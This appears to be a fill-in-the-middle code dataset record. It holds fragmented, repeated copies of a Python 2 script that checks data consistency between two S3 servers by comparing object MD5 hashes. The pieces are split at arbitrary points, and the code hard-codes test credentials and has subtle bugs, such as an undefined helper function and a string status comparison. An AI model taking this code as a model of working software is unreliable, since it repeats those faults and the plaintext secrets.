%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
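# Fetch the object from both servers concurrently: the worker thread runs make_request with
# process=True so it publishes its MD5 through the module-level MD5_Global (a Thread target
# cannot return a value), while the main thread downloads from server2 and gets md5_2 directly.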
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
| rFromXML(xmlBody | identifier_name |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None | if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
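# Fetch the object from both servers concurrently: the worker thread runs make_request with
# process=True so it publishes its MD5 through the module-level MD5_Global (a Thread target
# cannot return a value), while the main thread downloads from server2 and gets md5_2 directly.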
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr) | if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return [] | random_line_split |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
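# Returns a list of (key, versionId) tuples, e.g.
# '<Key>a.jpg</Key><VersionId>null</VersionId><Key>b.jpg</Key><VersionId>v2</VersionId>'
# yields [('a.jpg', None), ('b.jpg', 'v2')]; for non-versioned listings every versionId is None.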
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
# The request only counts as finished once the whole body has been read
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.rea | #记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
# Some error responses do not carry x-amz-request-id in the headers, so fall back to recvBody
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
# Close the connection: 1. per server semantics, close it when Connection: close is returned.
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
# Close the connection so that subsequent requests open a new one.
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
# 2. Close the connection on client-side connection errors.
elif not status <= '600':
logging.warning('caught exception, close connection')
# Most likely a network problem; close the connection so later requests reconnect.
myHTTPConnection.closeConnection()
time.sleep(.1)
# 3. The client is configured for short-lived connections
elif not myHTTPConnection.longConnection:
# Python below 2.7 has a bug: calling close() directly leaves the client socket in CLOSE_WAIT.
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
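# Minimal usage sketch of make_request, mirroring the __main__ flow below (handler1 and
# handler2 stand for S3RequestHandler instances built as in __main__; this is a comment-only
# illustration, not executed). One GetObject is issued per server; one of them runs on a
# worker thread whose MD5 is handed back through the module-level MD5_Global, because
# threading.Thread cannot return a value directly:
#   t = threading.Thread(target=make_request, args=(handler1, True, True))
#   t.start()
#   md5_2 = make_request(handler2, True, False)   # calMd5=True, process=False
#   t.join(); md5_1 = MD5_Global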
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
# Multiple users' AK/SK pairs can be specified here
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
